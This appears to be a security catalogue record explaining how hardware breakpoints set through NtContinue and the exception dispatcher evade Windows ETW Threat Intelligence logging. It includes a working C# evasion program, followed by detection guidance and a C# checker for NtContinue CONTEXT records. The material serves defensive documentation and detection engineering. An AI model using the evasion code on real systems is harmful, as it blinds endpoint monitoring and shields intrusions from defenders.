Bypass Record
ETW Tampering × Microsoft Windows ETW Threat Intelligence
A publicly reported instance of ETW Tampering bypassing Microsoft Windows ETW Threat Intelligence, recorded with its original source. Factual record; no assessment of any specific deployment.
Mechanism
Reaches NtContinue indirectly from managed code through the Windows user-mode exception dispatch path instead of calling it through P/Invoke: NtContinue does not return to its caller, so a direct P/Invoke call leaves the CLR's managed-to-unmanaged transition frame corrupted. An exception is raised deliberately, and the handler that receives it edits the CONTEXT record that ntdll's KiUserExceptionDispatcher passes to NtContinue once the handler asks for execution to continue. The edited CONTEXT carries the hardware breakpoints in Dr0-Dr7 (breakpoint addresses in Dr0-Dr3, enable and condition bits in Dr7) together with the CONTEXT_DEBUG_REGISTERS flag, so NtContinue loads them into the thread. Because the debug registers are set by NtContinue rather than by NtSetContextThread, nt!EtwTiLogSetContextThread is never reached and no Microsoft-Windows-Threat-Intelligence event records the change, which is the ETW TI detection the technique evades.
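The path described above, as an added example written for this record rather than code from the cited source: a C# program installs an execute breakpoint on the current thread without ever calling SetThreadContext, by having a vectored exception handler edit the CONTEXT that the dispatcher then hands to NtContinue. It assumes x64 Windows, a 64-bit process and the documented x64 CONTEXT field offsets; the private exception code and the choice of kernel32!Sleep as the breakpoint target are arbitrary assumptions for the demonstration.

```csharp
using System;
using System.Runtime.InteropServices;

// Added example (not the cited source's code). Assumes x64 Windows, a 64-bit process and the
// x64 CONTEXT layout. kernel32!Sleep is an arbitrary breakpoint target chosen for the demo.
static class HwbpViaExceptionDispatch
{
    [UnmanagedFunctionPointer(CallingConvention.Winapi)]
    delegate int VehHandler(IntPtr exceptionPointers);

    [DllImport("kernel32.dll")] static extern IntPtr AddVectoredExceptionHandler(uint first, VehHandler handler);
    [DllImport("kernel32.dll")] static extern uint RemoveVectoredExceptionHandler(IntPtr handle);
    [DllImport("kernel32.dll")] static extern void RaiseException(uint code, uint flags, uint nargs, IntPtr args);
    [DllImport("kernel32.dll", CharSet = CharSet.Ansi)] static extern IntPtr GetModuleHandleA(string name);
    [DllImport("kernel32.dll", CharSet = CharSet.Ansi)] static extern IntPtr GetProcAddress(IntPtr module, string name);
    [DllImport("kernel32.dll")] static extern void Sleep(uint ms);

    const uint ARM_CODE = 0xE0000001;              // private software exception code, only used to enter the dispatcher
    const uint EXCEPTION_SINGLE_STEP = 0x80000004; // raised by the CPU when a Dr0-Dr3 condition hits
    const int EXCEPTION_CONTINUE_EXECUTION = -1, EXCEPTION_CONTINUE_SEARCH = 0;
    const uint CONTEXT_DEBUG_REGISTERS = 0x00100010; // NtContinue loads Dr0-Dr7 only when this flag is set
    const int OFF_CONTEXTFLAGS = 0x30, OFF_EFLAGS = 0x44, OFF_DR0 = 0x48, OFF_DR7 = 0x70, OFF_RIP = 0xF8;
    const int EFLAGS_RF = 0x10000;                 // Resume Flag: run the breakpointed instruction once without re-trapping

    static IntPtr s_target;
    static int s_hits;
    static VehHandler s_keepAlive;                 // keeps the delegate alive behind the native function pointer

    static int Handler(IntPtr ep)
    {
        IntPtr record = Marshal.ReadIntPtr(ep, 0);      // EXCEPTION_POINTERS.ExceptionRecord
        IntPtr ctx = Marshal.ReadIntPtr(ep, 8);         // EXCEPTION_POINTERS.ContextRecord
        uint code = (uint)Marshal.ReadInt32(record, 0); // EXCEPTION_RECORD.ExceptionCode

        if (code == ARM_CODE)
        {
            // Edit the CONTEXT that KiUserExceptionDispatcher will pass to NtContinue:
            // slot 0 = execute breakpoint at s_target (Dr7.L0 = 1, RW0 = 00, LEN0 = 00).
            Marshal.WriteInt64(ctx, OFF_DR0, s_target.ToInt64());
            Marshal.WriteInt64(ctx, OFF_DR7, 1L);
            Marshal.WriteInt32(ctx, OFF_CONTEXTFLAGS,
                Marshal.ReadInt32(ctx, OFF_CONTEXTFLAGS) | (int)CONTEXT_DEBUG_REGISTERS);
            return EXCEPTION_CONTINUE_EXECUTION;      // the dispatcher now calls NtContinue(ctx) for us
        }
        if (code == EXCEPTION_SINGLE_STEP && Marshal.ReadIntPtr(ctx, OFF_RIP) == s_target)
        {
            s_hits++;                                 // breakpoint fired: s_target is about to execute
            Marshal.WriteInt32(ctx, OFF_EFLAGS, Marshal.ReadInt32(ctx, OFF_EFLAGS) | EFLAGS_RF);
            return EXCEPTION_CONTINUE_EXECUTION;
        }
        return EXCEPTION_CONTINUE_SEARCH;             // not ours (for example a CLR-generated exception)
    }

    static void Main()
    {
        s_keepAlive = Handler;
        IntPtr veh = AddVectoredExceptionHandler(1, s_keepAlive);   // first handler, ahead of the CLR's own
        s_target = GetProcAddress(GetModuleHandleA("kernel32.dll"), "Sleep");

        // No P/Invoke to NtContinue and no SetThreadContext: the synthetic exception makes
        // ntdll!KiUserExceptionDispatcher invoke NtContinue with the CONTEXT edited in Handler,
        // and that NtContinue call is what loads Dr0/Dr7 for this thread.
        RaiseException(ARM_CODE, 0, 0, IntPtr.Zero);

        Sleep(0);                                     // executes the address in Dr0 -> EXCEPTION_SINGLE_STEP
        Console.WriteLine("hardware breakpoint hits: " + s_hits);  // 1 if the breakpoint was installed

        RemoveVectoredExceptionHandler(veh);
    }
}
```

The handler is registered as the first vectored handler so that it sees the synthetic exception before the runtime's own handler does; returning EXCEPTION_CONTINUE_EXECUTION is what causes ntdll to hand the edited CONTEXT to NtContinue. Debug registers are per-thread, so the breakpoint only fires on the thread that raised the exception.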
Detection & mitigation
Monitor for suspicious use of NtContinue with a modified CONTEXT record, especially from managed processes such as PowerShell, using ETW providers such as Microsoft-Windows-Kernel-Process or Microsoft-Windows-Threat-Intelligence for process and thread context. Bear in mind that the Threat-Intelligence provider's SetThreadContext events are exactly what this path sidesteps: a debug-register change made through NtContinue produces none, so the CONTEXT argument has to be observed at the call itself, for example by a user-mode hook on ntdll!NtContinue. Deploy endpoint detection rules that alert on NtContinue calls whose CONTEXT has the DebugControl field or the debug registers (Dr0-Dr7, with CONTEXT_DEBUG_REGISTERS set) altered relative to the thread's current state, and enforce PowerShell Constrained Language Mode with script block logging, which blocks Add-Type and the other routes from PowerShell into unmanaged code.
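The check such a rule needs, as an added example that is not from the cited source: given the CONTEXT a caller passes to NtContinue, decide whether the call would install hardware breakpoints and report each one. It assumes the x64 CONTEXT layout and that the sensor (a hypothetical user-mode hook on ntdll!NtContinue, not shown) can hand over a pointer to the caller's buffer; the two CONTEXT buffers built in Main are constructed for the demo.

```csharp
using System;
using System.Collections.Generic;
using System.Runtime.InteropServices;

// Added example (not the cited source's code): the check a hook on ntdll!NtContinue, or any sensor
// that captures the CONTEXT argument, can apply before letting the call through. Assumes the x64
// CONTEXT layout. The sample CONTEXT buffers in Main are constructed, not captured.
static class NtContinueDebugRegisterCheck
{
    const int CONTEXT_SIZE = 0x4D0;
    const uint CONTEXT_DEBUG_REGISTERS = 0x00100010;
    const int OFF_CONTEXTFLAGS = 0x30, OFF_DR0 = 0x48, OFF_DR7 = 0x70;

    public struct Breakpoint { public int Slot; public ulong Address; public string Kind; public int Length; }

    // Hardware breakpoints that become active on the thread if this CONTEXT is passed to NtContinue.
    // Without CONTEXT_DEBUG_REGISTERS the kernel ignores Dr0-Dr7, so such a call installs nothing.
    public static List<Breakpoint> InstalledBy(IntPtr ctx)
    {
        var found = new List<Breakpoint>();
        uint flags = (uint)Marshal.ReadInt32(ctx, OFF_CONTEXTFLAGS);
        if ((flags & CONTEXT_DEBUG_REGISTERS) != CONTEXT_DEBUG_REGISTERS) return found;

        ulong dr7 = (ulong)Marshal.ReadInt64(ctx, OFF_DR7);
        for (int slot = 0; slot < 4; slot++)
        {
            bool enabled = ((dr7 >> (2 * slot)) & 3) != 0;          // L<n> (bit 2n) or G<n> (bit 2n+1)
            if (!enabled) continue;
            int rw = (int)((dr7 >> (16 + 4 * slot)) & 3);          // 00 execute, 01 write, 11 read/write
            int len = (int)((dr7 >> (18 + 4 * slot)) & 3);         // 00 = 1 byte, 01 = 2, 11 = 4, 10 = 8
            found.Add(new Breakpoint
            {
                Slot = slot,
                Address = (ulong)Marshal.ReadInt64(ctx, OFF_DR0 + 8 * slot),
                Kind = rw == 0 ? "execute" : rw == 1 ? "write" : rw == 3 ? "read/write" : "io",
                Length = len == 0 ? 1 : len == 1 ? 2 : len == 3 ? 4 : 8,
            });
        }
        return found;
    }

    // Builds a constructed CONTEXT for the demo; a real sensor reads the caller's buffer instead.
    static IntPtr FakeContext(uint flags, ulong dr0, ulong dr7)
    {
        IntPtr ctx = Marshal.AllocHGlobal(CONTEXT_SIZE);
        for (int i = 0; i < CONTEXT_SIZE; i += 8) Marshal.WriteInt64(ctx, i, 0);
        Marshal.WriteInt32(ctx, OFF_CONTEXTFLAGS, (int)flags);
        Marshal.WriteInt64(ctx, OFF_DR0, (long)dr0);
        Marshal.WriteInt64(ctx, OFF_DR7, (long)dr7);
        return ctx;
    }

    static void Main()
    {
        const uint CONTEXT_FULL = 0x0010000B;
        // Dr7 = 1 (L0 set, RW0/LEN0 = 0): execute breakpoint on the Dr0 address, the shape of the bypass above.
        IntPtr suspicious = FakeContext(CONTEXT_FULL | CONTEXT_DEBUG_REGISTERS, 0x7FF6A0001000UL, 1UL);
        // Same Dr values but no CONTEXT_DEBUG_REGISTERS: NtContinue leaves the debug registers untouched.
        IntPtr benign = FakeContext(CONTEXT_FULL, 0x7FF6A0001000UL, 1UL);

        foreach (var bp in InstalledBy(suspicious))
            Console.WriteLine($"ALERT slot {bp.Slot}: {bp.Kind} breakpoint, len {bp.Length}, at 0x{bp.Address:X}");
        Console.WriteLine($"benign context installs {InstalledBy(benign).Count} breakpoints");

        Marshal.FreeHGlobal(suspicious);
        Marshal.FreeHGlobal(benign);
    }
}
```

In a real hook the result of InstalledBy would be compared with the thread's current Dr0-Dr7 (from GetThreadContext) so that only newly enabled slots raise an alert; a context that merely carries the same breakpoints the thread already has is legitimate exception-return traffic.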
This is a record of a publicly reported event, not an assessment of any specific organization's deployment. Detection and mitigation notes are drawn from the cited source. Where the source is silent, fields are omitted.